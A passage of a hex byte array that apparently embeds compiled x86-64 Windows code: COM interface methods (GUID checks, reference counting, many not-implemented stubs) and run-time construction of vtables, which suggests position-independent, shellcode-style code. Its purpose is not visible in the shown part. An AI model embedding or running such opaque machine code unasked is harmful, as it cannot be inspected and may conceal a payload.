799 0x10, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45,
800 0x18, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00,
801 0x48, 0x8d, 0x15, 0xd5, 0x00, 0x00, 0x00, 0x48, 0x89, 0x10, 0x48, 0x8b,
802 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x69, 0x01, 0x00, 0x00,
803 0x48, 0x89, 0x50, 0x08, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48,
804 0x8d, 0x15, 0x91, 0x01, 0x00, 0x00, 0x48, 0x89, 0x50, 0x10, 0x48, 0x8b,
805 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xf3, 0x02, 0x00, 0x00,
806 0x48, 0x89, 0x50, 0x18, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48,
807 0x8d, 0x15, 0xae, 0x01, 0x00, 0x00, 0x48, 0x89, 0x50, 0x20, 0x48, 0x8b,
808 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x08, 0x03, 0x00, 0x00,
809 0x48, 0x89, 0x50, 0x28, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48,
810 0x8d, 0x15, 0x09, 0x03, 0x00, 0x00, 0x48, 0x89, 0x50, 0x30, 0x48, 0x8b,
811 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x0e, 0x03, 0x00, 0x00,
812 0x48, 0x89, 0x50, 0x38, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48,
813 0x8d, 0x15, 0x14, 0x02, 0x00, 0x00, 0x48, 0x89, 0x50, 0x40, 0x48, 0x8b,
814 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xfc, 0x02, 0x00, 0x00,
815 0x48, 0x89, 0x50, 0x48, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48,
816 0x8d, 0x15, 0xf9, 0x02, 0x00, 0x00, 0x48, 0x89, 0x50, 0x50, 0x48, 0x8b,
817 0x45, 0xf8, 0xc7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45,
818 0xf8, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x50, 0x50, 0x90, 0x48, 0x83,
819 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30,
820 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20,
821 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x83, 0x7d, 0x20,
822 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x75, 0x48, 0x8b,
823 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8d, 0x88, 0xfc, 0x03, 0x00,
824 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48,
825 0x89, 0xc2, 0xe8, 0x85, 0x13, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x25, 0x48,
826 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8d, 0x88, 0xac, 0x04,
827 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00,
828 0x48, 0x89, 0xc2, 0xe8, 0x60, 0x13, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x1b,
829 0x48, 0x8b, 0x45, 0x20, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x10, 0x48,
830 0x8b, 0x4d, 0x10, 0xe8, 0x1d, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00,
831 0x00, 0xeb, 0x10, 0x48, 0x8b, 0x45, 0x20, 0x48, 0xc7, 0x00, 0x00, 0x00,
832 0x00, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0x48, 0x83, 0xc4, 0x30, 0x5d,
833 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d,
834 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45,
835 0xf8, 0x48, 0x83, 0xc0, 0x08, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x45,
836 0xf0, 0xba, 0x01, 0x00, 0x00, 0x00, 0xf0, 0x0f, 0xc1, 0x10, 0x48, 0x8b,
837 0x45, 0xf8, 0x8b, 0x40, 0x08, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0x55,
838 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x48,
839 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0x48,
840 0x83, 0xc0, 0x08, 0x48, 0x89, 0x45, 0xe8, 0x48, 0x8b, 0x55, 0xe8, 0xb8,
841 0x01, 0x00, 0x00, 0x00, 0xf7, 0xd8, 0x89, 0xc1, 0x89, 0xc8, 0xf0, 0x0f,
842 0xc1, 0x02, 0x01, 0xc8, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0xf4, 0x48, 0x83,
843 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30,
844 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20,
845 0x4c, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8,
846 0x8b, 0x45, 0x20, 0x83, 0xe0, 0x02, 0x85, 0xc0, 0x74, 0x39, 0x48, 0x83,
847 0x7d, 0x30, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x70,
848 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x00, 0x48,
849 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x8b, 0x52, 0x28, 0x48,
850 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x50, 0x28,
851 0x48, 0x8b, 0x45, 0x30, 0x48, 0x89, 0x10, 0x8b, 0x45, 0x20, 0x83, 0xe0,
852 0x01, 0x85, 0xc0, 0x74, 0x36, 0x48, 0x83, 0x7d, 0x28, 0x00, 0x75, 0x07,
853 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x2d, 0x48, 0x8b, 0x45, 0xf8, 0x48,
854 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x55, 0xf8, 0x48,
855 0x83, 0xc2, 0x18, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0xf8,
856 0x48, 0x8d, 0x50, 0x18, 0x48, 0x8b, 0x45, 0x28, 0x48, 0x89, 0x10, 0xb8,
857 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x30, 0x5d, 0xc3, 0x55, 0x48,
858 0x89, 0xe5, 0x48, 0x83, 0xc4, 0x80, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89,
859 0x55, 0x18, 0xc7, 0x45, 0xac, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xa8,
860 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xa4, 0x00, 0x00, 0x00, 0x00, 0x48,
861 0x8d, 0x45, 0xb0, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00,
862 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x26, 0x11, 0x00, 0x00, 0x48, 0x8b,
863 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8d, 0x55,
864 0xb0, 0x48, 0x8b, 0x4d, 0x18, 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x83, 0x7d,
865 0xfc, 0x00, 0x75, 0x20, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48,
866 0x8b, 0x40, 0x20, 0x4c, 0x8d, 0x4d, 0xa4, 0x4c, 0x8d, 0x45, 0xa8, 0x48,
867 0x8d, 0x55, 0xac, 0x48, 0x8b, 0x4d, 0x18, 0xff, 0xd0, 0x89, 0x45, 0xfc,
868 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xec, 0x80, 0x5d, 0xc3, 0x55,
869 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30, 0x48, 0x89, 0x4d, 0x10, 0x48,
870 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48,
871 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8b, 0x40, 0x78, 0xff,
872 0xd0, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x18, 0x89, 0x10, 0xb8, 0x00, 0x00,
873 0x00, 0x00, 0x48, 0x83, 0xc4, 0x30, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
874 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x00, 0x00, 0x00,
875 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48,
876 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0xb8, 0x00, 0x00, 0x00, 0x00,
877 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55,
878 0x18, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
879 0x48, 0x89, 0x4d, 0x10, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55,
880 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0xb8, 0x00, 0x00, 0x00, 0x00,
881 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30, 0x48, 0x89,
882 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
883 0x00, 0x48, 0x8d, 0x15, 0xb2, 0x02, 0x00, 0x00, 0x48, 0x89, 0x10, 0x48,
884 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x5d, 0x03, 0x00,
885 0x00, 0x48, 0x89, 0x50, 0x08, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
886 0x48, 0x8d, 0x15, 0x7d, 0x03, 0x00, 0x00, 0x48, 0x89, 0x50, 0x10, 0x48,
887 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xa4, 0x03, 0x00,
888 0x00, 0x48, 0x89, 0x50, 0x18, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
889 0x48, 0x8d, 0x15, 0xbd, 0x03, 0x00, 0x00, 0x48, 0x89, 0x50, 0x20, 0x48,
890 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x06, 0x04, 0x00,
891 0x00, 0x48, 0x89, 0x50, 0x28, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
892 0x48, 0x8d, 0x15, 0x37, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x30, 0x48,
893 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x99, 0x04, 0x00,
894 0x00, 0x48, 0x89, 0x50, 0x38, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
895 0x48, 0x8d, 0x15, 0x9a, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x40, 0x48,
896 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x9b, 0x04, 0x00,
897 0x00, 0x48, 0x89, 0x50, 0x48, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
898 0x48, 0x8d, 0x15, 0x9c, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x50, 0x48,
899 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x9d, 0x04, 0x00,
900 0x00, 0x48, 0x89, 0x50, 0x58, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
901 0x48, 0x8d, 0x15, 0x9e, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x60, 0x48,
902 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xa1, 0x04, 0x00,
903 0x00, 0x48, 0x89, 0x50, 0x68, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
904 0x48, 0x8d, 0x15, 0xd3, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x70, 0x48,
905 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xd4, 0x04, 0x00,
906 0x00, 0x48, 0x89, 0x50, 0x78, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
907 0x48, 0x8d, 0x15, 0xd5, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0x80, 0x00,
908 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
909 0xd3, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0x88, 0x00, 0x00, 0x00, 0x48,
910 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xd1, 0x04, 0x00,
911 0x00, 0x48, 0x89, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
912 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xcf, 0x04, 0x00, 0x00, 0x48, 0x89,
913 0x90, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
914 0x48, 0x8d, 0x15, 0xcd, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xa0, 0x00,
915 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
916 0xca, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xa8, 0x00, 0x00, 0x00, 0x48,
917 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xd0, 0x04, 0x00,
918 0x00, 0x48, 0x89, 0x90, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
919 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xce, 0x04, 0x00, 0x00, 0x48, 0x89,
920 0x90, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
921 0x48, 0x8d, 0x15, 0xd4, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xc0, 0x00,
922 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
923 0xd2, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xc8, 0x00, 0x00, 0x00, 0x48,
924 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xea, 0x04, 0x00,
925 0x00, 0x48, 0x89, 0x90, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
926 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xec, 0x04, 0x00, 0x00, 0x48, 0x89,
927 0x90, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
928 0x48, 0x8d, 0x15, 0xea, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xe0, 0x00,
929 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
930 0xe8, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xe8, 0x00, 0x00, 0x00, 0x48,
931 0x8b, 0x45, 0x18, 0xc7, 0x40, 0x20, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
932 0x45, 0x18, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x50, 0x28, 0x48, 0x8b,
933 0x45, 0x10, 0x48, 0x8b, 0x80, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55,
934 0x18, 0x48, 0x83, 0xc2, 0x08, 0x48, 0x8b, 0x4d, 0x10, 0x48, 0x81, 0xc1,
935 0xdc, 0x03, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x83, 0x7d, 0xfc,
936 0x00, 0x75, 0x32, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48,
937 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x55, 0x18, 0x4c, 0x8d,
938 0x42, 0x10, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d, 0x8a, 0x8c, 0x04, 0x00,
939 0x00, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a, 0x08, 0x4c, 0x89, 0xca,
940 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x30,
941 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89,
942 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x48, 0x83,
943 0x7d, 0x20, 0x00, 0x75, 0x0a, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xe9, 0x91,
944 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x28, 0x48,
945 0x8d, 0x88, 0xfc, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8,
946 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xd4, 0x0d, 0x00, 0x00,
947 0x85, 0xc0, 0x74, 0x4a, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x28,
948 0x48, 0x8d, 0x88, 0x0c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41,
949 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xaf, 0x0d, 0x00,
950 0x00, 0x85, 0xc0, 0x74, 0x25, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
951 0x28, 0x48, 0x8d, 0x88, 0x8c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
952 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0x8a, 0x0d,
953 0x00, 0x00, 0x85, 0xc0, 0x75, 0x12, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x8b,
954 0x55, 0x10, 0x48, 0x89, 0x10, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x10,
955 0x48, 0x8b, 0x45, 0x20, 0x48, 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8,
956 0x02, 0x40, 0x00, 0x80, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48,
957 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x8b,
958 0x45, 0x10, 0x48, 0x83, 0xc0, 0x20, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b,
959 0x45, 0xf8, 0xba, 0x01, 0x00, 0x00, 0x00, 0xf0, 0x0f, 0xc1, 0x10, 0x48,
960 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x20, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3,
961 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10,
962 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc0, 0x20, 0x48, 0x89, 0x45, 0xf0,
963 0x48, 0x8b, 0x55, 0xf0, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xf7, 0xd8, 0x89,
964 0xc1, 0x89, 0xc8, 0xf0, 0x0f, 0xc1, 0x02, 0x01, 0xc8, 0x89, 0x45, 0xfc,
965 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89,
966 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x83, 0x7d,
967 0x18, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x0f, 0x48,
968 0x8b, 0x45, 0x18, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00,
969 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20,
970 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20, 0x4c,
971 0x89, 0x4d, 0x28, 0x48, 0x83, 0x7d, 0x28, 0x00, 0x75, 0x07, 0xb8, 0x03,
972 0x40, 0x00, 0x80, 0xeb, 0x30, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
973 0x10, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x55, 0x10,
974 0x48, 0x8b, 0x52, 0x10, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45,
975 0x10, 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b, 0x45, 0x28, 0x48, 0x89, 0x10,
976 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55,
977 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x48,
978 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x44, 0x89, 0x4d, 0x28, 0x48,
979 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x00, 0x48, 0x8b,
980 0x40, 0x50, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x8b, 0x4a, 0x10, 0x4c, 0x8b,
981 0x4d, 0x38, 0x44, 0x8b, 0x45, 0x28, 0x48, 0x8b, 0x55, 0x20, 0xff, 0xd0,
982 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83,
983 0xec, 0x60, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45,
984 0x20, 0x44, 0x89, 0x4d, 0x28, 0x8b, 0x45, 0x30, 0x66, 0x89, 0x45, 0xec,
985 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x00, 0x48,
986 0x8b, 0x40, 0x58, 0x44, 0x0f, 0xb7, 0x4d, 0xec, 0x48, 0x8b, 0x55, 0x10,
987 0x48, 0x8b, 0x4a, 0x10, 0x44, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x55, 0x50,
988 0x48, 0x89, 0x54, 0x24, 0x38, 0x48, 0x8b, 0x55, 0x48, 0x48, 0x89, 0x54,
989 0x24, 0x30, 0x48, 0x8b, 0x55, 0x40, 0x48, 0x89, 0x54, 0x24, 0x28, 0x48,
990 0x8b, 0x55, 0x38, 0x48, 0x89, 0x54, 0x24, 0x20, 0x48, 0x8b, 0x55, 0x10,
991 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x60,
992 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89,
993 0x55, 0x18, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89,
994 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40,
995 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10,
996 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55,
997 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8,
998 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89,
999 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1000 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x89, 0xd0, 0x66,
1001 0x89, 0x45, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48,
1002 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55,
1003 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x00,
1004 0x48, 0x8b, 0x40, 0x70, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x8b, 0x4a, 0x18,
1005 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00,
1006 0xba, 0xfd, 0xff, 0xff, 0xff, 0xff, 0xd0, 0xb8, 0x00, 0x00, 0x00, 0x00,
1007 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89,
1008 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1009 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55,
1010 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
1011 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00,
1012 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48,
1013 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48,
1014 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01,
1015 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d,
1016 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3,
1017 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0xb8,
1018 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89,
1019 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x4c, 0x89,
1020 0x4d, 0x28, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89,
1021 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40,
1022 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10,
1023 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28,
1024 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48,
1025 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80,
1026 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89,
1027 0x4d, 0x10, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
